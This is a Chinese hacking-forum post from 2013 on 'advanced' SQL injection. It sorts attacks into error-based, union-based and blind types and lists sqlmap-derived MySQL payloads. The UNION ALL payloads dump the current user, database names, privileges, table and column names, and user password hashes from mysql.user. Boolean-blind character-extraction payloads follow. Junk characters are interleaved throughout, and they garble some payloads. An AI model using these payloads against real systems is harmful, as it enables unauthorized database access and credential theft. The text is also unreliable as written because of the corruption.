放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。& X$ E7 Y+ B z1 _- e' ?; `
2 g8 g+ o1 f: ?: e p这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表' _% a: O) ^% n0 Z- N9 i
* T! s! z$ t2 C% \ ?分类标准 分类 备注
5 b! b: _+ S! g# v+ z按字段类型 整型注入,字符型注入
" M9 w* u9 W- i6 A9 {; J按出现的位置 get注入,post注入,cookie注入,http header注入
$ i8 n9 E7 `# L( ~+ O' Y然而高级注入是这样的
1 L$ | M% R" I: K " o, l: x2 [$ n8 [$ P5 }
高级注入分类 条件! f/ r. t% u. m7 h' a
error-based sql 数据库的错误回显可以返回,存在数据库,表结构9 s. _. U1 I2 D! x- b* Q6 ~
union-based sql 能够使用union,存在数据库,表结构1 x; B/ Y- @, U* _) Q, D2 c
blind sql 存在注入# o5 E1 m; y% ]3 S
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。: U* ]% v$ k G* ?6 o& z! g$ E
8 j/ L; p& H4 P% B1 V' s, p/ D- f7 x% r1 H
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
3 ?2 D& [4 `% T& M" o5 _! A9 |: |
/ r1 o8 V/ ?9 Y# o附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。- D. ]. B t+ y S8 R
- y. o+ P6 R+ r+ t' E: W8 {这里用mysql说明) B- r, V" }$ I
: u" K8 Q8 p4 _6 v* j% o, u, @
e注入坛子里很多了,请看戳我或者再戳我
8 I; y& H/ z0 z# T) K " j) {, g8 B1 }1 b) l
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
3 ]5 Z% M, R. Z. w6 a
$ x5 L+ s( C. @- p获取当前数据库用户名
6 V4 N; D* B# w 2 A1 \0 l: p+ t* H2 v
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C; E; N& ?# y- {. S; X. b/ z- F
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
$ t, I2 \/ a' ZL, NULL#0 m; V: E6 j0 j! z1 F- X
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
- W8 R, D+ w! M: h0 J . W: x3 m1 R; S- s* B/ z5 _
获取数据库名
$ g2 M' {; [1 n
5 o" _+ d! d6 tUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#7 g( |7 Z: {. @$ z0 O/ }& c
获取所有用户名
0 z2 g8 L \4 L2 W( \- U& v
# C- \- H5 W; C# l0 \. UUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
! O" K) |0 o* T) a7 ] o/ y查看当前用户权限
9 I3 h. G8 M/ c/ J X! k% {; U 7 M3 M/ [9 j/ D3 X3 ^$ W( ?
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#. k) X; h9 j, r2 b! s) d; s s8 |) J$ _$ l7 D
尝试获取密码,当然需要有能读mysql数据库的权限7 l% D# p B0 n/ ~0 ?
s \% q* S0 Q) i& {; S$ g
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#1 ?8 q% `5 L) R; \4 c
获取表名,limit什么的自己搞啦7 m5 \2 ?: Y) a& g& x
# u4 f! ?* l. s; N( G
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#/ V! s2 a# `4 D
获取字段名及其类型
6 T' U; d; P1 qUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#5 x3 l% x0 S; G7 Q# D
7 Y6 S, F3 w( L' G/ j8 Cb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。' c- q- a6 j" v# H6 ^
; @5 Y! }3 D' M- R9 @4 ~& A% z5 n
如:4 _; U! k8 G# T; k; [. K) B; ]
获取当前用户名
) }/ Q6 _0 E& H- W4 ~% ~$ ?7 r
# v; F: {4 Q( w1 t+ a+ }AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116& x2 ?4 x! Y Y2 |: C/ k4 Y% w& e
获取当前数据库
[0 t9 @: Z* l
6 F/ X8 v4 U0 O2 |AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
* u4 |+ n7 G6 z获取表名5 s5 d, f" A; v' i2 J
5 V8 {! v( O# g$ rAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51& ]7 t2 `- `4 `% H# I3 c$ K
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。$ u; }( a. \3 W+ z: A- F
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。2 y$ A6 c7 ]$ o3 _) n2 q# v5 v6 \
爆表5 O: O7 m- m$ y0 K0 {, _( _
7 y6 w$ x6 |- m2 o# A, AAND EXISTS(select * from table). h: V& P5 h: E% W9 n" ]5 O* Q5 t, `
爆字段
, f& Z3 s3 k. J, J
/ |' @0 I2 \: oAND EXISTS(select pwd from table)1 y3 B ]# i# i2 b
盲注的变化就比较多了,由于篇幅,只是举个例子而已。( I& _3 J5 n' Z& L' v5 z
) s6 {5 e4 B" d1 _* Z本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
+ p' i: R7 d* p+ @ r c# c. C |
发表于 2013-7-16 20:31:26
收藏
支持
反对